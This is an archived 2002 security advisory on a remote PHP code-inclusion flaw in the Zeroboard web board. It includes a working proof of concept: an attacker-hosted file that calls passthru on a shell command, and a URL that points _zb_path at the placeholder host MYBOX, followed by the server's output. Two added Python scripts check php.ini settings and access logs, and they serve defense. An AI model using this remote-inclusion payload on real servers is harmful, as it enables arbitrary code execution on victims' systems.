[UNIX] Zeroboard PHP Source Injection

From: support@securiteam.com
Date: 06/15/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 15 Jun 2002 21:37:10 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Zeroboard PHP Source Injection
------------------------------------------------------------------------

SUMMARY

Zeroboard <http://nzeo.com/> is one of the most popular PHP web boards in
Korea. A security vulnerability in the product allows remote attackers to
make the product include code hosted outside the web site into an existing
PHP page, which allows execution of arbitrary malicious code.

DETAILS

If both "allow_url_fopen" and "register_globals" are set to "on" in
php.ini, a security vulnerability in Zeroboard allows attackers to include
PHP code into the server's existing files. This is because "_head.php"
does not properly check incoming user-provided data.
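
A check for the two php.ini preconditions named above, as an added example that is not part of the original advisory or of Zeroboard. The sample php.ini text is constructed, and the built-in defaults used for absent directives are an assumption (PHP 4.2.0 or later).

```python
import re

# "name = value ; comment" as written in php.ini. Section headers and
# comment lines do not match because a name must start with a letter.
ASSIGN = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*(.*?)\s*(?:;.*)?$")
TRUTHY = {"1", "on", "true", "yes"}  # spellings PHP accepts for a boolean "on"

# Values used when a directive is absent. Assumption: PHP 4.2.0 or later;
# earlier releases shipped with register_globals on.
DEFAULTS = {"allow_url_fopen": True, "register_globals": False}

# Constructed sample configuration.
SAMPLE_INI = """\
[PHP]
; register_globals = Off
register_globals = On   ; kept on for a legacy board
allow_url_fopen = On
"""

def effective_flags(ini_text, defaults=DEFAULTS):
    """Resolve the two directives the advisory names; the last assignment wins."""
    flags = dict(defaults)
    for line in ini_text.splitlines():
        m = ASSIGN.match(line)
        if m and m.group(1) in flags:  # directive names are case-sensitive
            value = m.group(2).strip("\"'").lower()
            flags[m.group(1)] = value in TRUTHY
    return flags

def remote_include_preconditions_met(ini_text, defaults=DEFAULTS):
    """True only when both settings the advisory requires are on."""
    flags = effective_flags(ini_text, defaults)
    return flags["allow_url_fopen"] and flags["register_globals"]

if __name__ == "__main__":
    print(effective_flags(SAMPLE_INI))
    print(remote_include_preconditions_met(SAMPLE_INI))
```

Per-directory overrides such as php_flag lines in the web server configuration are not read by this check and have to be reviewed separately.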

Example:
Creating the following file:

--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------

And then accessing the following URL:
http://BOARD_URL/_head.php?_zb_path=http://MYBOX/

Will result in:
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php
apply_vote.php check_user_id.php comment_ok.php config.php data
del_comment.php del_comment_ok.php delete.php delete_ok.php download.php
error.php icon image_box.php images include index.html install.php
install1.php install2.php install2_ok.php install_ok.php latest_skin
lib.php license.txt list_all.php login.php login_check.php logout.php
lostid.php lostid_search.php member_join.php member_join_ok.php
member_memo.php member_memo2.php member_memo3.php member_modify.php
member_modify_ok.php member_out.php open_window.php outlogin.php
outlogin_skin schema.sql script select_list_all.php send_message.php
setup.php skin style.css view.php view_info.php view_info2.php
view_preview.php vote.php write.php write_ok.php zboard.php zipcode
Fatal error: Call to undefined function: dbconn() in
/home/morris/public_html/tmp/bbs/_head.php on line 41
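
A log check for requests of the shape shown above, as an added example that is not part of the original advisory. It generalizes from "_zb_path" to any query parameter of a PHP script whose value starts with a URL scheme; the log lines are constructed and MYBOX is the advisory's own placeholder.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a Common/Combined Log Format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme (http://, ftp://, ...).
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample log; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2002:21:30:01 +0200] "GET /bbs/zboard.php?id=free HTTP/1.0" 200 5120',
    '198.51.100.7 - - [15/Jun/2002:21:31:44 +0200] "GET /bbs/_head.php?_zb_path=http://MYBOX/ HTTP/1.0" 200 2048',
    '198.51.100.7 - - [15/Jun/2002:21:32:02 +0200] "GET /bbs/_head.php?_zb_path=%2568ttp%253A%252F%252FMYBOX%252F HTTP/1.0" 200 2048',
    '192.0.2.33 - - [15/Jun/2002:21:33:10 +0200] "GET /images/logo.gif?ref=http://portal.example/ HTTP/1.0" 200 910',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded scheme is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_hits(log_lines, script_suffix=".php"):
    """Return (line number, script path, parameter, decoded value) per suspect request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(script_suffix):
            continue  # only scripts the PHP interpreter executes
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = decode_fully(value).strip()
            if SCHEME.match(value):
                hits.append((number, url.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE_LOG):
        print(hit)
```

Legitimate parameters that carry URLs, such as redirect targets, will also be reported, so the returned parameter name is there for triage.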

ADDITIONAL INFORMATION

The information has been provided by morris <mailto:morris@xsdeny.net>.
